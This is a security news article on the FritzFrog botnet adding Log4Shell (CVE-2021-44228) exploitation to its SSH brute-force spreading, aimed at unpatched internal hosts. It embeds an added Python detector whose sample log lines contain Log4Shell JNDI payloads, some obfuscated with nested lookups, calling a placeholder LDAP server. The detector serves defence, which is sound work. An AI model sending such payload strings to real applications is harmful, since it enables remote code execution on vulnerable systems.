
FritzFrog Botnet Exploits Log4Shell

Botnet Looks for Vulnerable Internal Network Machines

Delivering more proof that the Log4Shell vulnerability is endemic, Akamai researchers detected botnet malware updated to use the flaw as an infection vector, supplementing its usual remote login brute force technique.

Akamai Security Intelligence Group observed the shift in the FritzFrog botnet, first documented in 2020.

Log4Shell, tracked as CVE-2021-44228, burst into public awareness in late 2021 when security researchers identified a flaw in the ubiquitous Apache Log4j 2 Java library. A panel of U.S. public and private sector security experts in mid-2022 warned that patching every vulnerable Log4j instance would likely take a decade "or longer" (see: Log4j Flaw Is 'Endemic,' Says Cyber Safety Review Board).

To spread their malware, FritzFrog operators exploit the fact that system administrators give lower priority to patching internal network machines. Internet-facing applications are an obvious priority for patching. But unpatched internal machines can still be a risk, the researchers said. FritzFrog looks for subnets and targets possible addresses within them.

"This means that even if the 'high-profile' internet-facing applications have been patched, a breach of any asset in the network by FritzFrog can expose unpatched internal assets to exploitation," they said.

To trigger the Log4Shell vulnerability, FritzFrog forces an application to log data containing a malicious payload. The payload forces the Java application to connect to a server controlled by the attacker and download a malware binary.
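The infection vector described above leaves a recognizable trace: the logged data carries a Log4j lookup string beginning with `${jndi:`. The following detector is an added illustration, not code from the article or from Akamai, that scans log lines for that indicator. It folds Log4j's `${lower:}`, `${upper:}` and `${...:-default}` lookups first, because an indicator split across nested lookups still resolves to the same string when Log4j processes it. The access-log lines and the `c2.invalid` hostname are constructed sample data.

```python
"""
Added example (not from the article or from Akamai's research): detect Log4j
lookup strings of the kind that trigger Log4Shell (CVE-2021-44228) in log
lines. All sample lines below are constructed for illustration.
"""
import re
from typing import Dict, List

# Matches one innermost lookup, i.e. ${...} with no further ${ } inside it.
_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# The indicator we are looking for once nesting has been folded away.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Fold the lookups Log4j would resolve to plain text before it sees
    the ${jndi:...} lookup itself:

      ${lower:X} / ${upper:X}   -> X, case-folded
      ${anything:-DEFAULT}      -> DEFAULT (default-value syntax)

    Other lookups (jndi, env, sys, ...) are left in place so the matcher
    can see them. Each round folds the innermost layer; the loop stops
    when a round changes nothing or max_rounds is reached.
    """
    def fold(match) -> str:
        body = match.group(1)
        if ":-" in body:
            return body.split(":-", 1)[1]
        key, sep, value = body.partition(":")
        if sep and key.lower() == "lower":
            return value.lower()
        if sep and key.lower() == "upper":
            return value.upper()
        return match.group(0)  # leave unknown lookups untouched

    for _ in range(max_rounds):
        folded = _LOOKUP.sub(fold, text)
        if folded == text:
            break
        text = folded
    return text


def find_log4shell_indicators(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per line that contains a JNDI lookup after folding.

    Each record carries the 1-based line number, the raw line and the
    normalized form, so an analyst can see what Log4j would have resolved.
    """
    hits: List[Dict[str, object]] = []
    for number, line in enumerate(lines, 1):
        normalized = normalize_lookups(line)
        if _JNDI.search(normalized):
            hits.append({"line": number, "raw": line, "normalized": normalized})
    return hits


# Constructed sample access-log lines; c2.invalid is a reserved placeholder name.
SAMPLE_LINES = [
    '10.0.5.12 - - [01/Feb/2024:10:00:01 +0000] "GET /api/health HTTP/1.1" 200 17 "-" "Mozilla/5.0"',
    '10.0.5.77 - - [01/Feb/2024:10:00:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://c2.invalid/a}"',
    '10.0.5.77 - - [01/Feb/2024:10:00:03 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://c2.invalid/b}"',
    '10.0.5.78 - - [01/Feb/2024:10:00:04 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://c2.invalid/c}"',
    "INFO  Order total ${price} computed for user 42",  # benign template text, must not match
]

if __name__ == "__main__":
    for hit in find_log4shell_indicators(SAMPLE_LINES):
        print(f"line {hit['line']}: {hit['normalized']}")
```

Running the block over `SAMPLE_LINES` flags lines 2, 3 and 4 and leaves the benign `${price}` placeholder alone; lines 3 and 4 only match because the nested lookups were folded first, which is the point of separating normalization from matching.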

Researchers in 2022 called FritzFrog a "new generation" of botnet for its use of a proprietary peer-to-peer protocol to spread across SSH servers worldwide.

It still uses brute force techniques to infect SSH servers, Akamai said, but will now "also attempt to identify specific SSH targets by enumerating several system logs on each of its victims."


About the Author

Prajeet Nair

Assistant Editor, Global News Desk, ISMG

Nair previously worked at TechCircle, IDG, Times Group and other publications, where he reported on developments in enterprise technology, digital transformation and other issues.
